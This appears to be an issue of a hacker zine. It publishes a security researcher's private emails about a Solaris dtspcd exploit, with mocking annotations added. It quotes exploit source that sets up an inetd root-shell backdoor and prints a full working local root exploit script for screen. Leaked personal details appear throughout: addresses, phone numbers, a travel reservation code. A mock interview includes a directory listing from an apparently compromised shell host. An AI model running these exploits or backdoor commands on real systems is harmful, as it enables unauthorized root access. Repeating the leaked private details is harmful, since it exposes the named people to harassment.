From: K2 <ktwo@ktwo.ca>
To: J4ne Spitzner <lance@honeynet.org>
Subject: Re: dtspc attack
Hey Lance, This version of the dtspcd exploit has been out for quite some
time. at least 3 months, it's the same version Ihave. Do you know what
signature it set off from snort?
The guy that wrote it put in some passwords for binaires that would be
distributed, so unfortuntatly some kiddies probably got it and are running
it all over the 'net :(
Anything inperticular you want to know about it?
Take care,
K2
Here are some snippets from the comments from my copy..
(I origianally found this vuln in '99;)
storm:/tmp/dtspcd/src# cat defs.h
...
/* inetd shell using above service w/passive success checking and cleanup
*/
#define DEFAULT_CMD \
"echo \"" /* service here */ " stream tcp nowait root /bin/sh sh
-i\">/tmp/x;" \
"/usr/sbin/inetd -s /tmp/x;" \
"sleep 10;" \
"/bin/rm -f /tmp/x ";
#define SUCCESS_CMD \
"uname -a;ls -l /core /var/dt/tmp/DTSPCD.log;" \
"PATH=/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin:/usr/ccs/bin:/usr/gnu/bin;"
\
"export PATH;echo \"BD PID(s): \"`ps -fed|grep ' -s /tmp/x'|grep -v
grep|awk '{print $2}'`\n"
....
storm:/tmp/dtspcd/src# cat dtspcd_ex.c
* What does it do?
*
* 1. remotely and silently gets the equivalent of:
* sh$ uname -nsrm
* 2. remotely and silently confirms or denies the
* existence of arbitrary user names.
* 3. remotely and somewhat silently obtain administrator
* privileges on the machine.
*
* FEATURES:
* i. ability to completely generate a target via command line
* parameters.
* ii. automatically detects which built-in target to use.
* iii. command line options override target settings.
* iv. cidr block scanning with CFLAGS='-DALLOW_CIDR -lm'
* v. option to read targets from a file
* vi. ability to brute force the target using -b
* vii. several different exploitation methods
* iix. optional password checking for binary release
* ix. passive success checking using sleep shell command
* x. tries multiple offsets automatically...
*
* PLANNED: (personal notes)
* - maybe do other OS's (AIX, OSF1)
* - eliminate nops..
*
* NOTE: this program logs nothing unless dtspcd is ran with
* -debug option.
*
* With use #3, worst cases are:
* a. /core created :(
* b. they had -debug on and they logged some information to
* /var/dt/tmp/DTSPCD.log
*
*
* For fix information see:
* CERT Advisory CA-2001-31 Buffer Overflow in CDE Subprocess
* Control Service
*
*
* some thanks/greets to:
* gersh, yowie, plaguez, sircasm, K2, silitek, SolarDiz, _j_j, none,
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: K2 <ktwo@ktwo.ca>
To: no D1ck ir sin <noir@olympos.org>
Subject: RE: .
Noir, check this out... a friend of mine coded it up... I'll get ya that
ttdb sploit soon, I'm just travelling in the US right now.
I hope you hadd a good Xmas/New Year...
Later,
K2
noir sin wrote:
> Hi K2,
>
> nothing much these days, I am packing up ; ). will change the damn place I
> am living .. so not much coding or anything
> so how you doin? btw, happy new year
>
> > BTW: I passed your code to a couple of ADM guys, they really liked it.
> which one telnetd or Tru64 ttdb ?
>
> I didnt work on the ttdb fmt exploit lately. I will be so much happy if you
> could enlighten me about the issue ...
> Actually, I am working out a project that will pack almost all known
> exploits and some unknown exploits
> for Solaris and maybe some Tru64. ( well main reason is I only got some
> Solaris boxens and a Tru64 access )
>
> I wish to keep in touch with skilled ppl like you, I believe we can exchange
> real good info.
>
> take care,
> noir
>
> -----Original Message-----
> From: K2 [mailto:ktwo@ktwo.ca]
> To: noir@olympos.org
> Subject: .
>
> noir, How is it going? You getting that ttdb code working? I've got some
> time next week if you still having trouble, I'll work it out.
>
> BTW: I passed your code to a couple of ADM guys, they really liked it.
>
> Take care,
> K2
>
Attach: dtspcd-8.4.tgz
Size: 30K
note: a glimpse of the most elite zeroday trading network
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: K2 <ktwo@ktwo.ca>
To: J4ne <lance@honeynet.org>
Subject: West Point
Hey Lance, Glad to hear that nfo helped out :)
I got clearence to get late february off to go speak if the spot's still
open :)
Lemme know thx!!
K2
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: K2 <ktwo@ktwo.ca>
To: Lance Spitzner <lance@honeynet.org>
Subject: Re: dtspc attack
Expect a ADMmutate copy eventually ;)
but i was talking to my man... and like you can ask me questions to relay
to him if you want.
Cool about West Point I'll leason with Dragos for flights and stuffs...
Thx again.
K2
Lance Spitzner wrote:
> K2 wrote:
> > Hey Lance, This version of the dtspcd exploit has been out for quite some
> > time. at least 3 months, it's the same version Ihave. Do you know what
> > signature it set off from snort?
>
> Standard SPARC Shellcode, alert below.
>
> [**] [1:645:2] SHELLCODE sparc NOOP [**]
> [Classification: Executable code was detected] [Priority: 1]
> :05.950417 208.61.1.160:3594 -> 172.16.1.102:6112
> TCP TTL:48 TOS:0x0 ID:41402 IpLen:20 DgmLen:1500 DF
> ***AP*** Seq: 0xFF24BFA4 Ack: 0x5F79CFDD Win: 0x3EBC TcpLen: 32
> TCP Options (3) => NOP NOP TS: 463986841 4158950
> [Xref => http://www.whitehats.com/info/IDS353]
>
> > The guy that wrote it put in some passwords for binaires that would be
> > distributed, so unfortuntatly some kiddies probably got it and are running
> > it all over the 'net :(
>
> heh heh, I sure do. First, do you have an exact date when this code
> exploit was written? I'm curious to see how long it went from actual
> code to the the kiddie community.
> I'm thinking of writing a KYE paper on this exploit. The paper would
> outline the life cycle of an exploit. From vulnerability identification,
> to exploit code, to common kiddie use. We seem to have knowledge of
> all the elements. This would make a very beneficial paper to the
> community if we could document this process. What do you think about
> such a paper? We would need some input from the person who wrote the
> exploit, but anonymity would not be a problem. I know alot of .gov/.mil
> people would be very interested in such a work. Thoughts?
>
> By the way, you are famous as hell with the following agencies, Max
> Kilger and I talked about you.
>
> NSA, CIA, FBI, DoD, NSF, NIST, DARPA, NPS, DoJ, Secret Service, etc ... :)
>
> love and kisses ...
>
> lance
>
note: ktwo and lance are the best narc duo i've ever seen
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: K2 <ktwo@ktwo.ca>
To: Lance Spitzner <lance@honeynet.org>
Subject: Re: West Point, we are a go
Lance, What dates should I get booked off from work? (I'm actually just
going to work remotely, so I can be pretty libral).
What format will the talks be?
Any of the SUN box's look pretty fly man :) I love rack mount!!
I'll take a peek at that paper soon, I'm remote from home until next week
so I'm pretty slow on a few things (I am in the US right now).
TTYL!
K2
Lance Spitzner wrote:
> All right gents,
>
> We are a go for West Point on 26 December. Dragos,
> as always I'm putting in a personal request for the
> leather pants. I need a bio from you folks, so send
> me one before Monday if possible. They need the bios
> so they can determine just how many people are going
> to attend our presentation :)
>
> They asked for estimates on travel expenses, this is
> what I gave them (just for travelling).
>
> Dragos/K2 - $1,200 each
> Michael/Jeff - $150 each
>
> Go ahead and make your travel arrangements know (especially
> K2 and Dragos). If my travel estimates are off, I need
> to know now. This is what they told me about airports
> --- snip snip ---
>
> The best airport is Stewart/Newburgh (SWF) about 20 miles north of West
> Point. Other airports in order of ease/distance include:
>
> Newark, NJ (EWR)
> LaGuardia, NY (LGA)
> JFK, NY (JFK)
>
> Although I have never flown in/out of Westchester (HPN), I have heard
> positive things about the airport if you can get a flight.
>
> --- snip snip ---
>
> --
> Lance Spitzner
> http://project.honeynet.org
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: K2 <ktwo@ktwo.ca>
To: Viz Engine <kristalyviz@hotmail.com>
Subject: Re: your mail
Sure, I'll take a look.
K2
Viz Engine wrote:
> hi,
>
> I have a privat exploit for wu-imapd, developed it for linux and BSD.
> Since I have no access to Solaris or HP-UX I would like to ask you to
> port it to that systems. Would you?
>
> Viz
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: K2 <ktwo@ktwo.ca>
To: Lance Spitzner <lance@honeynet.org>
Subject: Re: glined
glined is a type of ban off IRC "I was glined" == "I was globally banned
from the undernet"
if you connect multiple times to IRC with the same IP (3 or more), you
will be glined (for abuse)
Take care,
K2
Lance Spitzner wrote:
> Dude,
>
> What in the hell does 'glined' mean? This is taken
> from the GFORCE chats.
>
> :D1ck :i have the whole billing system
> :D1ck :glined
> :D1ck :i have the whole billing system of example
> :D1ck :oye
> :D1ck :heh
> :J4n3 :lol
> :J4n3 :glined how ?
> :J4n3 :they didn't have the same ip
> :J4n3 :billing system of example ??
>
> Thanks!
>
> --
> Lance Spitzner
> http://project.honeynet.org
note: lance is a dumb fuck
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: K2 <ktwo@ktwo.ca>
To: Lance Spitzner <lance@honeynet.org>
Subject: Re: dtspc attack
Here is what I got from jduck, (talk to him too see if he wants his name
in the final report though).
I can help with the writeup when I get back to Van, jd said it's cool if
you contact him too.
[jduck(dcc)] 1. discovered by aix in 1999
[jduck(dcc)] aix fixed it in 1999
[jduck(dcc)] 2. re-discovered by ISS in 2000 in solaris
[jduck(dcc)] err 2001 perhaps?
[d[jduck(dcc)] disclosed to sun in march 2001
jduck(dcc)] cert/iss/etc disclosed to public november 2001
[jduck(dcc)] exploit created late november 2001
[jduck(dcc)] given to trusted people and testers
[jduck(dcc)] careless left around by certain people and stolen
<
[jduck(dcc)] shared by unknown others
jdrake@qoop.org
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: K2 <ktwo@ktwo.ca>
To: R1Ley Hassell <rhassell@eeye.com>
Subject: Re: Hey man
sure, just keep it to self right ;)
What's new? I'm still lookin for new work :(
Later,
K2
Riley Hassell wrote:
> You got a copy of the new dtspc sploit?
>
> -R
>
Attach: dtspcd-8.6.tgz
Size: 35K
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: K2 <ktwo@ktwo.ca>
To: Lance Spitzner <lance@honeynet.org>
Subject: Re: dtspcd exploit usage
OK, gimme some time on this one, I've never used the sploit.
Lance Spitzner wrote:
> K2,
>
> Dude, I notified several .gov agencies that we
> have obtained the exploit. They can use this
> information to better protect against attacks.
> I figured your buddy will not mind, as we obtained
> it from 'the wild'.
>
> Anyways, could you give me a short paragraph on
> how the exploit works and is used? Organizations
> need to understand how the tool works, and how
> the kiddies can use it. You are the
> expert, so your insight will greatly help.
>
> Thanks!
>
> lance
>
note: cant figure it out smart guy?
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: K2 <ktwo@ktwo.ca>
To: Lance Spitzner <lance@honeynet.org>
Subject: Re: dtspcd exploit obtained (fwd)
I'll ask him
Lance Spitzner wrote:
> Your buddy interested in chatting with the MITRE folks?
> Alot of people are very impresses with his exploit :)
>
> --
> Lance Spitzner
> http://project.honeynet.org
>
> ---------- Forwarded message ----------
> From: J4ne Gray <j4ne@mitre.org>
> To: Lance Spitzner <lance@honeynet.org>
> Subject: Re: dtspcd exploit obtained
>
> I went to the apparent authors website. It hardly mentions an interest in
+security,
> but it does look like he used to teach at the University of Central Michigan
> http://jdrake.qoop.org/art/ has some pictures of him. Are you familiar with
+this
> person at all?
>
> I'm wondering if he didn't write this code to teach someone else and then that+person
> started distributing it. This guy looks like he knows his stuff and not
+stripping the
> symbols doesn't seem to fit with that.
>
> Josh
>
> Lance Spitzner wrote:
>
> > J4ne Gray wrote:
> >
> > > It was very nice of the author to include his name and email :). I was
+looking
> > > at the strings output and it looks like the author took a lot of time to
+do error
> > > checking and write one of the better usage statements i've seen. I also
+didn't
> > > notice a single misspelling and no script kiddish text at first glance.
+To me
> > > that says a few things about the author. Is this typical of what you see
+in
> > > exploit code? Most of the stuff i've seen in public postings is nowhere
+near
> > > this clean.
> >
> > Its extremely well written, and powerful. Definitely not our
> > typical exploit :)
> >
> > lance
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: K2 <ktwo@ktwo.ca>
To: Lance Spitzner <lance@honeynet.org>
Subject: Re: dtspcd exploit obtained (fwd)
that's funny
Lance Spitzner wrote:
> K2 wrote:
>
> > I'll ask him
>
> Dude, this is not a big deal. Just a lot of
> people interested in his exploit code, its more
> impressive then most. NSA and FBI even asked
> me for a copy. :)
>
> lance
note: nsa cant write their own version?
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: K2 <ktwo@ktwo.ca>
To: Dug Song <dugsong@monkey.org>
Subject: Re: feh
lame o
KIller man, thx :)))
Dug Song wrote:
> this is the most retarded shite:
>
> http://www.ngsec.com/whitepapers.html
>
> btw, i rewrote fragrouter as fragroute (runs on your local
> machine). evades everything, including snort, and it will hide all of
> your shellcode NOPs as well, with any of the TCP chaffing attacks or
> TCP segment forward overlap:
>
> http://www.monkey.org/~dugsong/fragroute-0.1.tar.gz
>
> don't redistribute, it's rough code that i want to clean up for
> release sometime...
>
> -d.
>
> ---
> http://www.monkey.org/~dugsong/
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: K2 <ktwo@ktwo.ca>
To: Cloakware Corporation <charlene.hosein@cloakware.com>
Subject: Re: Network Intrusion Detection
Charlene, I was just wondering, Stanley told me about a demonstration
package of your cloaking technologie where a binary with some source code
is sent out. Do you think I could have a copy of this?
Thanks much,
Shane
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: K2 <ktwo@ktwo.ca>
To: Lance Spitzner <lance@honeynet.org>
Subject: Re: IRC chats
Well, It's probably a spoof...
beer:~# telnet pentagon-hqdadss.army.pentagon.mil 23
Trying 134.11.6.1...
Connected to pentagon-hqdadss.army.pentagon.mil.
Escape character is '^]'.
VM/ESA ONLINE--HQDADSS --PRESS BREAK KEY TO BEGIN SESSION.^]
telnet> q
Connection closed.
VM/OS box, idono, Idoubt that somebody is IRC'ng from there ;)
CU
K2
Lance Spitzner wrote:
> Looks like one of the guys is coming in from pentagon.army.mil.
> Is this correct?
>
> --
> Lance Spitzner
> http://project.honeynet.org
note: its the analyzer!!!
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
---------- Forwarded message ----------
From: Matt Conover <shok@dataforce.net>
To: w00w00@blackops.org
Subject: w00w00 with TechTV
TechTV had a segment on the ethics of hacking with a featured commentary
on w00w00. See it at
http://www.techtv.com/news/security/story/0,24195,3369909,00.html.
Matt
note: w00w00 looks lame lately, keep it up!
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: K2 <ktwo@ktwo.ca>
To: Catherine Nolan <catherine@syngress.com>
Subject: Re: your mail
Catherine: Here you are, sorry for the sparsity but I am very private
about many of the details outlined by the bio guidelines.
K2 is a security engineer. He works on a variety of systems ranging from
most any UNIX flavor to any other lesser OS. He has spent a lot of time
working through security issues wherever they exist; core kernels,
networking services or binary protections. K2 is a member of w00w00 and
is a contributing member of The Honeynet Project. I would like to thank
Anya for all her help and support throughout the year.
Thanks,
K2
note: Cathy, could you please add: k2 is also owned
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: K2 <ktwo@ktwo.ca>
To: Catherine Nolan <catherine@syngress.com>
cc: Kate Glennon <kate@syngress.com>
Hi, Sorry I've been in Toronto all week and did not see these mails (i've
only had remote access to mail). I'll get the changes back to you by
tomarrow morning.
Thanks,
K2
Catherine Nolan wrote:
> Hey K2 -
> I need your revisions today.....the book is going to the printer next week
> and I need to have your chapter copyedited, laid out, and reviewed.
> If the book doesn't go to press next week - we're not going to have books in
> time for doubleday book club. Doubleday has ordered a significant number of
> copies for a promotion - the books must be in their warehouse by March 4th.
> It takes at least a week and a half to print a book - usually longer. As a
> royaltied author - if we miss this date - we miss 3500 units in sales. This
> will affect your income from your contribution considerably.
>
> They are not happy if we don't ship our books on time.
>
> I cannot impress upon you the urgency of this matter - your revisions were
> due on Monday - it is now Thursday.
>
> Please send these revisions to me as soon as you can - preferably before the
> end of the day.
>
> Thank you,
> Catherine
>
> Catherine B. Nolan
> Acquisitions Editor
> catherine@syngress.com
> 781-681-5151 ext 18
>
> Syngress Publishing
> 800 Hingham Street
> Rockland, MA 02370
> http://www.syngress.com
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: K2 <ktwo@ktwo.ca>
To: "Presby, T. MAJ EECS" <dt7765@exmail.usma.army.mil>
Subject: Re: USMA - Honey Net Travel Arrangements
Major Presby: Thanks for your help, I was just wondering if is possiable
that I change the return portion of this trip to layover in Kansas City
until Sunday March 3 I'll pay any difference in cost (it may even be
cheaper with the Saturday stay).
Thanks,
K2
Presby, T. MAJ EECS wrote:
> K2,
>
> Your invitational travel orders are complete and we look forward to your
> visit later this month. An electronic ticket has been generated and will be
> waiting for you at the Vancouver Airport. A complete itinerary is available
> at https://virtuallythere.com. Use the following reservation code and your
> last name to view your itinerary.
>
> Reservation Code: ESEUXD
>
> Your flight travels via Chicago to Newark, so you will be on the same flight
> as Dragos Ruiu and Lance Spitzner. Lance is authorized the rental car, so
> you will travel in one vehicle to West Point.
>
> Your lodging costs will be covered during your stay. Please contact the
> Hotel Thayer to reserve and hold your room for 25-26 Dec with your credit
> card (you will be reimbursed after the fact). Hotel Thayer has a website
> http://www.hotelthayer.com/ and they can be reached at 1-800-247-5047.
> Ensure that you mention that you are traveling under invitational travel
> orders and require the government rate.
>
> Please feel free to contact me if you have additional questions. We look
> forward to your visit.
>
> Tim
> Major Timothy Presby
> Asst. Prof., Dept. of Electrical Engineering and Computer Science
> United States Military Academy, West Point, NY 10996
> Thayer Hall 113 Phone: 845-938-5569 DSN: 688
> Email: timothy-presby@usma.edu
note: hey timmy, smile for the cameras!!
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: K2 <ktwo@ktwo.ca>
To: <horizon@monkey.org>
Subject: !.?
miss you
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: K2 <ktwo@ktwo.ca>
To: joewee <joewee@monkey.org>
Subject: Re: defcon?
joewee: where are you ? I'm in NYC now.
TTYL
K2
joewee wrote:
> from dt;
>
>
> Sounds very cool. I'd be interested in reading the book when it comes
> out. People always talk about writing a book like that, but no one ever
> does.
> On another note, do you know if ADM or w00w00 has anything up their
> sleeves
> that might make for a good release at DEF CON? With the cDc basically
> falling through the last two years we are looking to see if any
> respectable
> groups have something cool they want to showcase and release come con
> time.
>
> ----
>
> anyone plan on going to defcon?
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: K2 <ktwo@ktwo.ca>
To: Lance Spitzner <lance@honeynet.org>
cc: 'Dragos Ruiu' <dr@kyx.net>, <ahuger@securityfocus.com>
Subject: Re: ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT
ALERT (fwd)
From what I hear gobbles is a composit, (made up from more then 1)
person(s). But it's all speculation anyhow. There's tons of Solaris
holes, and a grandious claim that "if you run it your vuln" is always BS,
I'm sure a moderately hardend host would be fine.
ttyl,
K2
Lance Spitzner wrote:
> Who the f*ck is this guy. He repeatedly has the most interesting
> posts I've ever read. The note at the bottom has me concerned :)
>
> --
> Lance Spitzner
> http://project.honeynet.org
>
> ---------- Forwarded message ----------
> From: gobbles@hushmail.com
> To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org,
> vuln-dev@securityfocus.com, bugs@securitytracker.com
> Subject: ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT
>
> Dear World,
> Below is copy paste of GOBBLES advisory for NTOP. NTOP available from
+www.ntop.org. This serious remote root bug in logging mechanism. Time for
+alert and disclosure is now.
>
> Website with other advisories at http://www.bugtraq.org. It look like shit
+because on free host. GOBBLES poor researcher who not out for the big dollar,
+and nothing that can be done about this at this time.
> ...
> Greets:
> Our #1 fan, Dave Aitel. Dave, GOBBLES love you -- you get free GOBBLES Security tshirt at Defcon.
>
>
> Love to all (but especially to "bob"),
> GOBBLES Security
> http://www.bugtraq.org
> GOBBLES@hushmail.com
>
>
> ps: GOBBLES currently in communication with Sun Microsystems about lethal remote bug in Solaris 6, 7, and 8. Sun has asked GOBBLES to wait one month to release advisory so that service can be fixed. GOBBLES not sure if he can wait this
long, but will try very hard to not click "send" for while longer on hole. If you run Solaris, likely you are vulnerable. But you will have to wait.
>
> No joke, this serious remote root hole. GOBBLES turned blind eye to argument
from hackers about danger of releasing vulnerabilities. GOBBLES know that only
hackers care about non-disclosure. Anyone else is likely to be very boring. :))))
>
> Hey, GOBBLES considered two ways of getting fame and recognition for he world-class security group... 1. put up a message board on bugtraq.org with gobbles group name branded all over it and let world know he have private exploits... 2. submit ground-breaking research to the securityfocus mailing lists.....
>
> hey, the latter has a bigger audience ;)))))))
>
> Hush provide the worlds most secure, easy to use online applications - which solution is right for you?
> HushMail Secure Email http://www.hushmail.com/
> HushDrive Secure Online Storage http://www.hushmail.com/hushdrive/
> Hush Business - security for your Business http://www.hush.com/
> Hush Enterprise - Secure Solutions for your Enterprise http://www.hush.com/
>
> Looking for a good deal on a domain name? http://www.hush.com/partners/offers.cgi?id=domainpeople
> ------------ Output from pgp ------------
> Pretty Good Privacy(tm) Version 6.5.8
> (c) 1999 Network Associates Inc.
> Uses the RSAREF(tm) Toolkit, which is copyright RSA Data Security, Inc.
> Export of this software may be restricted by the U.S. government.
> File is signed. signature not checked.
> key does not meet validity threshold.
> WARNING: Because this public key is not certified with a trusted
> signature, it is not known with high confidence that this public key
> actually belongs to: "(KeyID: 0x2199B00F)".
note: GOBBLE GOBBLE, lance afraid of the turkey?! :PpppPPpPPPp
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: K2 <ktwo@ktwo.ca>
To: "Ragsdale, D. LTC EECS" <DD9182@exmail.usma.army.mil>
Subject: Re: Glad to hear you are coming to NY
LTC Ragsdale: I'm glad that most of the exploits worked. The local
privalage escalation exploits may be a little more trickey, I think I had
sent a couple whitch will break a non-executable stack, these tend to be a
lot more fradgile, maybe play with the stack offset values and script a
brute forcing script...
Sure, I'm sort of hap-hazardly getting my life together here, I'm
booked solid through May-5, but will be available after that. Let me know
whenmight work for you and I'll work with that.
Talk to you later,
K2
PS. My recent trip reminded me that almost 4years ago I nearly enlisted
to the US Army, but then decided to go on for more school.
Ragsdale, D. LTC EECS wrote:
> K2;
>
> The Solaris exploits you sent were excellent. They were just what I
> needed. I had luck with all of them except the user2root buffer overflows
> - I could not get the offsets right. Any suggestions?
>
> Also, is there any chance we could convince you to spend a day with
> us in the near future? We would pay any travel expenses and, possibly,
> provide monetary compensation for your time. We would ask you to assist us
> to by implementing working exploits in our lab. Tell me what you think.
>
> -Dan
note: well Liutenant dan, ktwo already works for CSIS, sorry!
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
############### I N C L O S I N G
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
i hope you enjoyed this little look into the liFe of a whitehat,
which can be summed up in: m0nEy-Ca$h-lameness. from mediocre
crackers, to full blown security professionals, you've certainly
made it easy on us!
ktwo, be gracious we left out your kewl poems!
catch me next month as i feature more whitehat allstars for your
viewing pleasure. NO MERCY FOR WHITEHATS!!@#@#
-- odaymaztr
.~e~----------------------------------------------------------~e~.
; *03* zeroday screen exploit -- lcamtuf ;
`----------------------------------------------------------------'
[CUT_HERE] screen.sh
#!/bin/bash
# **DO NOT DISTRIBUTE**
#
# A simple screen(1) exploit (tested against 3.09.11)
# - by Michal Zalewski (lcamtuf@bos.bindview.com)
# ----------------------------------------------------
# Usage: "./unscreen", then resume screen `00'.
# ----------------------------------------------------
# Ugh, blah... Should be written in C, but I don't
# really care now :)
# I haven't had time to check other versions, but see
# if this works for you too...
#
# This exploit is private, but you know that already...
#
# **DO NOT DISTRIBUTE**
#
SCREEN=/usr/bin/screen
umask 0
if [ ! -x $SCREEN ]; then
echo "I can't execute $SCREEN..."
exit 0
fi
LINK=`echo $HOME|awk '{print $1 " "}'`.pts-00.dupa
if [ -f "$LINK" ]; then
echo "DAMN. I don't have usable pts socket available..."
exit 0
fi
echo -ne "Finding root owned tty...\t\t"
unset TTY
for x in /dev/tty[0-9]* /dev/pts/? /dev/pts?? ; do
if [ "`ls -ln $x|awk {'print $3'}`" = "0" ]; then
TTY="$x"
break
fi
done
echo -n "$TTY"
if [ "$TTY" = "" ]; then
echo -e "\nI can't find a root owned tty!"
exit 0
fi
if [ ! -w $HOME -o ! -w /tmp ]; then
echo -e "\nI can't write $HOME/.screenrc or to /tmp..."
exit 0
fi
cat >$HOME/.screenrc <<_EOF_
vbell on
defscrollback 100
autodetach on
termcapinfo * '' 'hs:ts=\E_:fs=\E\\:ds=\E_\E\\'
defsocketpath $LINK
_EOF_
echo -ne "\nStarting screen...\t\t\t"
$SCREEN -S 00 -c $HOME/.screenrc -aA -m -D -q &>/dev/null &
SCPID=`echo $!`
echo -n "PID: $SCPID"
while :; do
sleep 1
if [ "$#" -ge "0" ]; then
break
fi
done
cd /tmp
ln -fs $LINK $HOME/ &>/dev/null
echo -ne "\nWaiting for socket to be created...\t"
CNT=5 # Timeout
while [ "$CNT" -gt "0" -a ! -f "$LINK" ]; do
let CNT=$CNT-1
sleep 1
done
echo -n "Done."
echo -ne "\nLinking to root owned terminal...\t\t"
ln -fs $TTY $LINK &>/dev/null
echo -ne "\nComplete. Now do \"$SCREEN -r 00\".\nCleaning up..."
$SCREEN -wipe &>/dev/null &
rm -fr $HOME/.screenrc $LINK &>/dev/null
echo -ne "\rComplete.\n"
exit 1
[END_CUT] screen.sh
.~e~----------------------------------------------------------~e~.
; *04* lyfestylez of the owned and lamest with pm -- r0b1nleech ;
`----------------------------------------------------------------'
PART ONE:
<r0b1nleech> Hello, and welcome, to lyfestylez of the owned and lamest
<pm> hehe
<r0b1nleech> Our guest today is pm. pm runs one of the most secure
+
shell systems known to mankind, tell us about your system pm.
<pm> well robin, first off i would like to introduce myself
<pm> my handle stands for prepubescent monkey, no just kidding! it
+ stands for plurbious monk. i have hosted one of the most well known
+ and well renounced shell systems ever.
<pm> yes thats right, i run sneakerz.org
<r0b1nleech> :D
<pm> sneakerz.org is home to some of the finest hackers that grace
+ our planet earth. freebsd employees and yahoo employees also use
+ our super secure system.
<r0b1nleech> Hey pm, tell our viewers where you have worked recently :)
<pm> well robin, i have worked at Yahoo!, google, hotmail, microsoft, and
+ iss. i have been all over.. hehe
<r0b1nleech> Thats quite a line up.
<pm> yes r0b1n, i have a vast amount of security knowledge, i am a
+ security professional.
<pm> props to w00w00 and ADM!
<pm> oh ya, HFD!
<pm> oh i would like to also state that: I HAVE NEVER BEEN OWNED, IF YOU
+ SAY YOU OWN ME, SHOW ME SOME FUCKING LOGS. IF YOU DONT HAVE LOGS
+ SHUT YOUR FUCKING LAME MOUTH BECAUSE YOU DONT OWN SHIT.
<pm> hehe
<r0b1nleech> So pm, which known hackers have used your system?
<pm> well, off the top of my head there is: jobe, napster, billf,
+ ratcorpse, par (cant fucking forget the par master), jbl, stran9er,
+ darkcube, jduck, shok, cr, cryp, suid, dmess0r, nimrood, duke
+ mux, yowie, udp, korndogz (kinda lame), awnex, jimjones, soupnazi,
+ miff (9mm HFD!), paul, and knowfx.
<pm> damn i have a good memory hehe
<r0b1nleech> I would like to point out for a second that napster is
+ the guy who started napster.com, jbl is cripo of SSG, cr is one
+ of the best known crackers in hacker history (unix bowling team),
+ and duke is the best whitehat i have ever seen.
<pm> yes i've watched cr hack before, he's real good
<pm> and props to #!w00w00 on efnet
<r0b1nleech> What is the #!w00w00 key?
<pm> no key for you r0b1n :)
<pm> route and dugsong hang out there, really elite channel
<r0b1nleech> let's take a break for a second and watch some midget porn
PART TWO:
<r0b1nleech> Welcome back, let's get on with the show.
<pm> hehe
<r0b1nleech> I am currently on pm's system, this is an amazing sight.
+ This system is so locked down its ridiculous. I don't think anyone
+ could ever hack this.
<pm> yes r0b1n, its secured real tight, and has custom freebsd kernel mods.
<r0b1nleech> I am currently sitting in the root directory, pm, show us
+ around :)
<pm> why of course r0b1n.
<pm> hmm where to start
<pm> ok, lets just go straight to the good stuff first
# cd /home/staff/monk
<pm> ok here we are, my sacred directory, this is where all my private
+ files go, all my warez, and all my mail goes.
# ls |less
983.tsl_bind.c* lice420pre7.tar.gz*
BigIron-EXO1.tftp* lo*
BigIron-Exo1.tftp* mail/
BigIron-HE1.tftp* md5passwd.c*
BigIron-HE2.tftp* me.jpg*
BigIron-SU1.tftp* moo*
BigIron-SU2.tftp* ms-ip.txt
Extacy.c mutt-sneakerz-14095-0*
Mail/ mutt-sneakerz-309-0*
Messages* mutt-sneakerz-43165-0*
NetIron-HE1.tftp* new-server-guidelines.txt*
NetIron-HE2.tftp* newircd.tgz*
NetIron-SU1.tftp* par*
NetIron-SU2.tftp* par2.pl*
README* pixconfig*
README.skuld* pm*
Trng-07_BGP4.ppt* pos.ppt*
_mywctb.ircrc* quotes.txt*
a* res.txt*
a.c resume.txt*
acl.txt* rh7linuxconf.pl.txt
ascii_woman.txt* route.gif*
babykitty* sendmail.c
backup.sneakerz.monk.2.28.01.tar.gz server.sh*
bgp.exo* shells*
bobek.c* sinner*
cbufp_cb.pdf* sk8.bx*
cco.txt* skuld3.tar.gz*
chbin* solx86_bind.c
cisco* story*
cluepon.txt* temp/
dave.jpg* textbox.irc.lb3*
